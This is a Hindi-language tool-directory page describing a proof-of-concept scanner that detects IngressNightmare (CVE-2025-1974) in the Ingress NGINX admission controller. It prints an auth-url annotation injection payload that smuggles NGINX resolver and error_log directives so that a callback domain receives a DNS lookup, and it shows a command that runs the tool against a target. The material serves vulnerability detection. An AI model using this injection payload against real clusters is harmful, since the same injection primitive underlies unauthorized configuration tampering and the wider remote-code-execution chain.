Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ingressnightmare-detection-poc — इन्ग्रेसनाइटमेयर (CVE-2025-1974) का पता लगाने के लिए (गैर-हस्तक्षेपकारी) सक्रिय माध्यमों से प्रूफ-ऑफ-कॉन्सेप्ट टूल | Kitploit
उपकरण/GitHubGitHub/m-q-t/ingressnightmare-detection-poc
भेद्यता स्कैनरशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगक्लाउड सुरक्षागलत कॉन्फ़िगरेशन
GitHubm-q-t/ingressnightmare-detection-poc

ingressnightmare-detection-poc

इन्ग्रेसनाइटमेयर (CVE-2025-1974) का पता लगाने के लिए (गैर-हस्तक्षेपकारी) सक्रिय माध्यमों से प्रूफ-ऑफ-कॉन्सेप्ट टूल

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

IngressNightmare डिटेक्शन टूल

अवलोकन

यह टूल Ingress NGINX कंट्रोलर को प्रभावित करने वाली IngressNightmare भेद्यता श्रृंखला (CVE-2025-1974) के लिए एक गैर-आक्रामक डिटेक्शन क्षमता प्रदान करता है। यह विशेष रूप से auth-url एनोटेशन इंजेक्शन वेक्टर (CVE-2025-24514) का उपयोग करके, बिना कोई मनमाना कोड निष्पादित किए, इस गंभीर भेद्यता की उपस्थिति की पुष्टि करता है।

तकनीकी पृष्ठभूमि

IngressNightmare भेद्यता श्रृंखला हमलावरों को विभिन्न Ingress एनोटेशन फ़ील्ड के माध्यम से मनमाना NGINX कॉन्फ़िगरेशन निर्देश इंजेक्ट करने की अनुमति देती है। जब इन दुर्भावनापूर्ण Ingress संसाधनों को एडमिशन कंट्रोलर द्वारा संसाधित किया जाता है, तो इंजेक्ट किए गए निर्देशों का मूल्यांकन NGINX कॉन्फ़िगरेशन सत्यापन चरण (nginx -t) के दौरान किया जाता है।

यह PoC विशेष रूप से एक syslog सर्वर के साथ error_log निर्देश को इंजेक्ट करके auth-url एनोटेशन भेद्यता का शोषण करता है, जो हमलावर-नियंत्रित डोमेन की ओर इंगित करता है। कॉन्फ़िगरेशन सत्यापन के दौरान, NGINX निम्न कार्य करेगा:

  1. इंजेक्ट किए गए कॉन्फ़िगरेशन को पार्स करें
  • निर्दिष्ट डोमेन को DNS के माध्यम से रिज़ॉल्व करें
  • यह DNS रिज़ॉल्यूशन गतिविधि, कोड निष्पादन या सेवा विघटन के बिना, यह पुष्टि करने के लिए एक विश्वसनीय संकेत प्रदान करती है कि लक्ष्य भेद्य है।

    उपयोग

    1. Burp Collaborator, interactsh, या किसी भी DNS मॉनिटरिंग सेवा का उपयोग करके एक DNS कॉलबैक लिसनर स्थापित करें।

    2. डिटेक्शन टूल निष्पादित करें:

      root@kitploit:~
      $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
      
    3. यदि भेद्य है, तो आप अपने DNS कॉलबैक डोमेन पर DNS रिज़ॉल्यूशन प्रयास देखेंगे:

    poc

    डिटेक्शन पद्धति

    यह टूल विशेष रूप से निर्मित एक AdmissionReview ऑब्जेक्ट तैयार करता है जिसमें निम्नलिखित इंजेक्शन पेलोड वाला एक Ingress संसाधन होता है:

    root@kitploit:~
    nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"
    

    यह पेलोड:

    • URL को समाप्त करने के लिए कमेंट कैरेक्टर (#) का उपयोग करता है
    • एक resolver निर्देश के बाद न्यूलाइन इंजेक्ट करता है
    • DNS कॉलबैक डोमेन की ओर इंगित करने वाले syslog के साथ error_log निर्देश जोड़ता है
    • सिंटैक्टिक वैधता बनाए रखने के लिए शेष भाग को कमेंट कर देता है

    जब किसी भेद्य एडमिशन कंट्रोलर द्वारा संसाधित किया जाता है, तो यह एक आउटबाउंड DNS लुकअप में परिणत होता है जो भेद्यता की उपस्थिति की पुष्टि करता है।

    सीमाएँ

    यह टूल केवल भेद्यता की उपस्थिति का पता लगाता है और मनमाना कोड निष्पादन के लिए इसका शोषण करने का प्रयास नहीं करता है।

    श्रेय

    https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities

    टूल डाउनलोड करें